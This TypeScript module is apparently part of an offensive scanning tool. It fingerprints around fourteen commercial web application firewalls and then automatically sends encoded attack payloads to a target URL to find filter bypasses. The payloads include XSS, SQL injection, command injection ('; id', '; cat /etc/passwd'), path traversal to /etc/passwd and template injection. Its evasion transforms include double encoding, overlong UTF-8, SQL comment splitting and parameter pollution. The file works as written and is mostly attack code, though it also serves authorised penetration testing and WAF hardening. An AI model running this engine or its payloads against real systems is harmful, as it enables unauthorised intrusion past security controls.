/**
 * waf_bypass_engine — Dedicated WAF detection, fingerprinting, and bypass module.
 *
 * Extracted from the automation engine's phase 4g to provide:
 *   1. Standalone WAF fingerprinting with a richer signature database
 *   2. Multi-layer encoding chains (not just single transforms)
 *   3. Per-WAF bypass playbooks tuned to vendor-specific weaknesses
 *   4. Protocol-level bypass techniques (HTTP/2, chunked TE, header injection)
 *   5. API endpoint for on-demand WAF analysis outside of full hunts
 */

import axios from 'axios';

// ---------------------------------------------------------------------------
// Types
// ---------------------------------------------------------------------------

export interface WafSignature {
  name: string;
  vendor: string;
  headers: Record<string, RegExp>;
  bodyPatterns: RegExp[];
  statusCodes: number[];
  /** Cookie patterns that betray the WAF vendor */
  cookiePatterns?: RegExp[];
}

export interface WafDetection {
  name: string;
  vendor: string;
  confidence: number;
  endpoint: string;
  evidence: string[];
}

export interface BypassTechnique {
  name: string;
  category: 'encoding' | 'protocol' | 'structural' | 'semantic';
  /** Human description of why this works */
  rationale: string;
  transform: (payload: string) => string;
  /** WAF vendors this technique is most effective against */
  effectiveAgainst?: string[];
}

export interface BypassResult {
  technique: string;
  category: string;
  payloadType: string;
  originalPayload: string;
  encodedPayload: string;
  originalStatus: number;
  bypassStatus: number;
  cleanStatus: number;
  endpoint: string;
  wafName: string;
  confidence: number;
}

// ---------------------------------------------------------------------------
// WAF Signature Database — extended set with cookie and CDN indicators
// ---------------------------------------------------------------------------

const WAF_SIGNATURES: WafSignature[] = [
  {
    name: 'Cloudflare',
    vendor: 'Cloudflare',
    headers: { 'server': /cloudflare/i, 'cf-ray': /.+/, 'cf-cache-status': /.+/ },
    bodyPatterns: [/cloudflare/i, /ray ID/i, /cf-chl-bypass/i, /Attention Required/i],
    statusCodes: [403, 503, 429],
    cookiePatterns: [/__cf_bm/, /cf_clearance/],
  },
  {
    name: 'AWS WAF',
    vendor: 'Amazon',
    headers: { 'x-amzn-requestid': /.+/, 'x-amzn-waf-action': /.+/ },
    bodyPatterns: [/aws|amazon/i, /request blocked/i, /AWSWAF/i],
    statusCodes: [403],
  },
  {
    name: 'Akamai Kona',
    vendor: 'Akamai',
    headers: { 'x-akamai-transformed': /.+/, 'server': /AkamaiGHost/i, 'x-akamai-request-id': /.+/ },
    bodyPatterns: [/akamai/i, /reference.*#/i, /Access Denied/i],
    statusCodes: [403],
    cookiePatterns: [/AKA_A2/, /akamai/i],
  },
  {
    name: 'Imperva/Incapsula',
    vendor: 'Imperva',
    headers: { 'x-cdn': /Imperva|Incapsula/i, 'x-iinfo': /.+/ },
    bodyPatterns: [/incapsula|imperva|_Incapsula_Resource/i, /Request unsuccessful/i],
    statusCodes: [403],
    cookiePatterns: [/incap_ses_/, /visid_incap_/],
  },
  {
    name: 'F5 BIG-IP ASM',
    vendor: 'F5',
    headers: { 'server': /BIG-IP|BigIP/i, 'x-cnection': /.+/ },
    bodyPatterns: [/request rejected|the requested URL was rejected/i, /support ID/i],
    statusCodes: [403],
    cookiePatterns: [/BIGipServer/, /TS[0-9a-f]{8}/],
  },
  {
    name: 'ModSecurity',
    vendor: 'OWASP',
    headers: { 'server': /mod_security|NOYB/i },
    bodyPatterns: [/mod_security|modsecurity|NOYB/i, /blocked by ModSecurity/i],
    statusCodes: [403, 406],
  },
  {
    name: 'Sucuri',
    vendor: 'GoDaddy/Sucuri',
    headers: { 'server': /Sucuri/i, 'x-sucuri-id': /.+/, 'x-sucuri-cache': /.+/ },
    bodyPatterns: [/sucuri|cloudproxy/i, /access denied.*sucuri/i],
    statusCodes: [403],
    cookiePatterns: [/sucuri_cloudproxy/],
  },
  {
    name: 'Barracuda',
    vendor: 'Barracuda',
    headers: { 'server': /Barracuda/i },
    bodyPatterns: [/barracuda/i, /barra_counter_session/i],
    statusCodes: [403],
    cookiePatterns: [/barra_counter_session/],
  },
  {
    name: 'Fortinet/FortiWeb',
    vendor: 'Fortinet',
    headers: { 'server': /FortiWeb/i },
    bodyPatterns: [/fortigate|fortiweb|fgd_icon/i],
    statusCodes: [403],
    cookiePatterns: [/FORTIWAFSID/],
  },
  {
    name: 'Wordfence',
    vendor: 'Defiant',
    headers: {},
    bodyPatterns: [/wordfence|wfBlock/i, /generated by Wordfence/i, /wfvt_/i],
    statusCodes: [403, 503],
  },
  {
    name: 'Fastly',
    vendor: 'Fastly',
    headers: { 'x-served-by': /.+/, 'x-cache': /.+/, 'via': /varnish/i },
    bodyPatterns: [/fastly/i, /Fastly error/i],
    statusCodes: [403, 503],
    cookiePatterns: [],
  },
  {
    name: 'Radware AppWall',
    vendor: 'Radware',
    headers: { 'x-sl-compstate': /.+/ },
    bodyPatterns: [/radware|appwall|unauthorized activity/i],
    statusCodes: [403],
    cookiePatterns: [],
  },
  {
    name: 'DDoS-Guard',
    vendor: 'DDoS-Guard',
    headers: { 'server': /ddos-guard/i },
    bodyPatterns: [/ddos-guard/i],
    statusCodes: [403],
    cookiePatterns: [/__ddg/],
  },
  {
    name: 'Vercel Firewall',
    vendor: 'Vercel',
    headers: { 'x-vercel-id': /.+/, 'server': /Vercel/i },
    bodyPatterns: [/vercel/i, /blocked.*vercel/i],
    statusCodes: [403],
  },
];

// ---------------------------------------------------------------------------
// Bypass Technique Library — multi-layer, categorized
// ---------------------------------------------------------------------------

const BYPASS_TECHNIQUES: BypassTechnique[] = [
  // --- Encoding ---
  {
    name: 'Double URL encoding',
    category: 'encoding',
    rationale: 'WAF decodes once; backend decodes twice, executing the payload',
    transform: (p) => encodeURIComponent(encodeURIComponent(p)),
  },
  {
    name: 'Unicode escape',
    category: 'encoding',
    rationale: 'WAF regex misses unicode-encoded characters',
    transform: (p) => p.split('').map(c => `\\u${c.charCodeAt(0).toString(16).padStart(4, '0')}`).join(''),
  },
  {
    name: 'HTML entity (decimal)',
    category: 'encoding',
    rationale: 'Browser decodes HTML entities but WAF sees raw &#...; sequences',
    transform: (p) => p.split('').map(c => `&#${c.charCodeAt(0)};`).join(''),
  },
  {
    name: 'HTML entity (hex)',
    category: 'encoding',
    rationale: 'Hex HTML entities bypass pattern matchers expecting decimal',
    transform: (p) => p.split('').map(c => `&#x${c.charCodeAt(0).toString(16)};`).join(''),
  },
  {
    name: 'Mixed case mutation',
    category: 'encoding',
    rationale: 'Case-sensitive regex patterns miss mIxEd CaSe',
    transform: (p) => p.split('').map((c, i) => i % 2 === 0 ? c.toUpperCase() : c.toLowerCase()).join(''),
  },
  {
    name: 'Hex encoding',
    category: 'encoding',
    rationale: 'Percent-hex encoding bypasses string-match rules',
    transform: (p) => p.split('').map(c => `%${c.charCodeAt(0).toString(16).padStart(2, '0')}`).join(''),
  },
  {
    name: 'Overlong UTF-8',
    category: 'encoding',
    rationale: 'Overlong encoding of < and > bypasses angle-bracket filters',
    transform: (p) => p.replace(/</g, '\xC0\xBC').replace(/>/g, '\xC0\xBE'),
    effectiveAgainst: ['ModSecurity', 'F5 BIG-IP ASM'],
  },
  {
    name: 'Base64 in eval',
    category: 'encoding',
    rationale: 'Payload is base64-encoded; WAF cannot match the decoded content',
    transform: (p) => `eval(atob("${Buffer.from(p).toString('base64')}"))`,
  },

  // --- Structural ---
  {
    name: 'SQL comment insertion',
    category: 'structural',
    rationale: 'SQL comments break pattern continuity: SE/**/LECT passes but SELECT is blocked',
    transform: (p) => p.replace(/\s+/g, '/**/'),
    effectiveAgainst: ['ModSecurity', 'AWS WAF'],
  },
  {
    name: 'Null byte insertion',
    category: 'structural',
    rationale: 'Null bytes can terminate WAF string scanning early',
    transform: (p) => p.split('').join('%00'),
  },
  {
    name: 'Tab/newline substitution',
    category: 'structural',
    rationale: 'Tab characters bypass space-delimited pattern matching',
    transform: (p) => p.replace(/\s+/g, '\t'),
  },
  {
    name: 'Chunked payload split',
    category: 'structural',
    rationale: 'Splitting payload across chunks can prevent full-body inspection',
    transform: (p) => { const mid = Math.floor(p.length / 2); return p.slice(0, mid) + '\r\n' + p.slice(mid); },
  },
  {
    name: 'Newline injection (CRLF)',
    category: 'structural',
    rationale: 'CRLF in path or params can bypass path-based WAF rules',
    transform: (p) => p.replace(/\s+/g, '%0d%0a'),
  },

  // --- Semantic (SQLi-specific) ---
  {
    name: 'SQL concat bypass',
    category: 'semantic',
    rationale: 'String concatenation rebuilds blocked keywords at runtime',
    transform: (p) => p
      .replace(/SELECT/gi, 'SEL' + "+''" + 'ECT')
      .replace(/UNION/gi, 'UNI' + "+''" + 'ON')
      .replace(/OR/gi, '||'),
    effectiveAgainst: ['AWS WAF', 'Cloudflare'],
  },
  {
    name: 'JSON-based SQLi',
    category: 'semantic',
    rationale: 'JSON in SQL WHERE clause bypasses traditional SQLi pattern matching',
    transform: (p) => p.replace(/' OR 1=1--/i, "' OR JSON_EXTRACT('{\"a\":1}','$.a')=1--"),
    effectiveAgainst: ['ModSecurity', 'Cloudflare'],
  },

  // --- Protocol-level ---
  {
    name: 'HTTP parameter pollution',
    category: 'protocol',
    rationale: 'Duplicate params: WAF checks first, backend uses last',
    transform: (p) => `harmless&q=${encodeURIComponent(p)}`,
    effectiveAgainst: ['Cloudflare', 'Akamai Kona'],
  },
  {
    name: 'Content-Type mismatch',
    category: 'protocol',
    rationale: 'WAF inspects body as form-urlencoded; backend parses as JSON',
    transform: (p) => JSON.stringify({ q: p }),
  },
  {
    name: 'Path traversal normalization',
    category: 'protocol',
    rationale: 'Path like /./admin or /foo/../admin bypasses exact-path WAF rules',
    transform: (p) => `./${p}`,
  },
];

// ---------------------------------------------------------------------------
// Core Engine
// ---------------------------------------------------------------------------

export class WafBypassEngine {
  /**
   * Fingerprint WAFs on a target URL by sending probe payloads and
   * matching response signatures.
   */
  static async fingerprint(
    targetUrl: string,
    opts: { timeout?: number; customHeaders?: Record<string, string> } = {},
  ): Promise<WafDetection[]> {
    const timeout = opts.timeout ?? 8000;
    const detections: WafDetection[] = [];
    const evidenceMap: Record<string, string[]> = {};

    const triggerPayloads = [
      '<script>alert(1)</script>',
      "' OR 1=1--",
      '../../etc/passwd',
      '; cat /etc/passwd',
    ];

    for (const payload of triggerPayloads) {
      try {
        const sep = targetUrl.includes('?') ? '&' : '?';
        const testUrl = `${targetUrl}${sep}wafprobe=${encodeURIComponent(payload)}`;
        const res = await axios.get(testUrl, {
          timeout,
          validateStatus: () => true,
          maxRedirects: 0,
          headers: opts.customHeaders,
        });

        const bodyStr = typeof res.data === 'string' ? res.data : JSON.stringify(res.data);
        const setCookies = Array.isArray(res.headers['set-cookie'])
          ? res.headers['set-cookie']
          : res.headers['set-cookie'] ? [res.headers['set-cookie']] : [];
        const cookieStr = setCookies.join('; ');

        for (const sig of WAF_SIGNATURES) {
          const matches: string[] = [];

          for (const [header, pattern] of Object.entries(sig.headers)) {
            const val = String(res.headers[header] || '');
            if (val && pattern.test(val)) matches.push(`Header ${header}: ${val}`);
          }
          for (const pattern of sig.bodyPatterns) {
            if (pattern.test(bodyStr)) matches.push(`Body: ${pattern.source}`);
          }
          if (sig.cookiePatterns) {
            for (const cp of sig.cookiePatterns) {
              if (cp.test(cookieStr)) matches.push(`Cookie: ${cp.source}`);
            }
          }
          if (sig.statusCodes.includes(res.status) && matches.length > 0) {
            matches.push(`Status: ${res.status}`);
          }

          if (matches.length >= 2) {
            if (!evidenceMap[sig.name]) evidenceMap[sig.name] = [];
            evidenceMap[sig.name].push(...matches);
          }
        }
      } catch {}
    }

    for (const [name, evidence] of Object.entries(evidenceMap)) {
      const unique = [...new Set(evidence)];
      const sig = WAF_SIGNATURES.find(s => s.name === name);
      detections.push({
        name,
        vendor: sig?.vendor ?? 'Unknown',
        confidence: Math.min(unique.length / 4, 1.0),
        endpoint: targetUrl,
        evidence: unique,
      });
    }

    return detections;
  }

  /**
   * Run bypass techniques against a target where a WAF has been detected.
   * Returns successful bypasses.
   */
  static async testBypasses(
    targetUrl: string,
    detectedWafs: WafDetection[],
    opts: { timeout?: number; maxBypasses?: number; customHeaders?: Record<string, string> } = {},
  ): Promise<BypassResult[]> {
    const timeout = opts.timeout ?? 8000;
    const maxBypasses = opts.maxBypasses ?? 10;
    const results: BypassResult[] = [];
    const wafNames = detectedWafs.map(w => w.name);

    const basePayloads = [
      { name: 'XSS', value: '<script>alert(1)</script>', blockedStatus: [403, 406, 501] },
      { name: 'SQLi', value: "' OR 1=1--", blockedStatus: [403, 406, 501] },
      { name: 'RCE', value: '; id', blockedStatus: [403, 406, 501] },
      { name: 'Path Traversal', value: '../../../../etc/passwd', blockedStatus: [403, 406, 501] },
      { name: 'SSTI', value: '{{7*7}}', blockedStatus: [403, 406, 501] },
    ];

    // Get clean baseline
    let cleanStatus = 0;
    let cleanBodyLen = 0;
    try {
      const sep = targetUrl.includes('?') ? '&' : '?';
      const cleanRes = await axios.get(`${targetUrl}${sep}q=harmless_test`, {
        timeout, validateStatus: () => true, maxRedirects: 0,
        headers: opts.customHeaders,
      });
      cleanStatus = cleanRes.status;
      const cleanBody = typeof cleanRes.data === 'string' ? cleanRes.data : JSON.stringify(cleanRes.data);
      cleanBodyLen = cleanBody.length;
    } catch { return results; }

    // Skip redirect-only targets
    if (cleanStatus >= 300 && cleanStatus < 400) return results;

    // Prioritize techniques effective against detected WAFs
    const sortedTechniques = [...BYPASS_TECHNIQUES].sort((a, b) => {
      const aScore = a.effectiveAgainst?.some(w => wafNames.includes(w)) ? 0 : 1;
      const bScore = b.effectiveAgainst?.some(w => wafNames.includes(w)) ? 0 : 1;
      return aScore - bScore;
    });

    for (const bp of basePayloads) {
      if (results.length >= maxBypasses) break;

      // Verify the raw payload is actually blocked
      let blockedStatus = 0;
      try {
        const sep = targetUrl.includes('?') ? '&' : '?';
        const blockedRes = await axios.get(
          `${targetUrl}${sep}q=${encodeURIComponent(bp.value)}`,
          { timeout, validateStatus: () => true, maxRedirects: 0, headers: opts.customHeaders },
        );
        blockedStatus = blockedRes.status;
        if (!bp.blockedStatus.includes(blockedStatus)) continue;
      } catch { continue; }

      for (const technique of sortedTechniques) {
        if (results.length >= maxBypasses) break;
        try {
          const encoded = technique.transform(bp.value);
          const sep = targetUrl.includes('?') ? '&' : '?';
          const bypassUrl = `${targetUrl}${sep}q=${encodeURIComponent(encoded)}`;
          const bypassRes = await axios.get(bypassUrl, {
            timeout, validateStatus: () => true, maxRedirects: 0,
            headers: opts.customHeaders,
          });

          const bypassBody = typeof bypassRes.data === 'string'
            ? bypassRes.data : JSON.stringify(bypassRes.data);
          const notBlocked = !bp.blockedStatus.includes(bypassRes.status) && bypassRes.status !== 400;
          const statusMatchesClean = bypassRes.status === cleanStatus;
          const sizeMatchesClean = cleanBodyLen === 0
            ? bypassBody.length === 0
            : Math.abs(bypassBody.length - cleanBodyLen) < cleanBodyLen * 0.5;

          if (notBlocked && (statusMatchesClean || sizeMatchesClean)) {
            results.push({
              technique: technique.name,
              category: technique.category,
              payloadType: bp.name,
              originalPayload: bp.value,
              encodedPayload: encoded.substring(0, 500),
              originalStatus: blockedStatus,
              bypassStatus: bypassRes.status,
              cleanStatus,
              endpoint: targetUrl,
              wafName: wafNames.join(', ') || 'Unknown',
              confidence: statusMatchesClean && sizeMatchesClean ? 0.9 : 0.7,
            });
          }
        } catch {}
      }
    }

    return results;
  }

  /** Return the full technique library for UI display or selection. */
  static getTechniques(): Array<{ name: string; category: string; rationale: string }> {
    return BYPASS_TECHNIQUES.map(t => ({
      name: t.name,
      category: t.category,
      rationale: t.rationale,
    }));
  }

  /** Return the full WAF signature list for UI display. */
  static getSignatures(): Array<{ name: string; vendor: string }> {
    return WAF_SIGNATURES.map(s => ({ name: s.name, vendor: s.vendor }));
  }
}
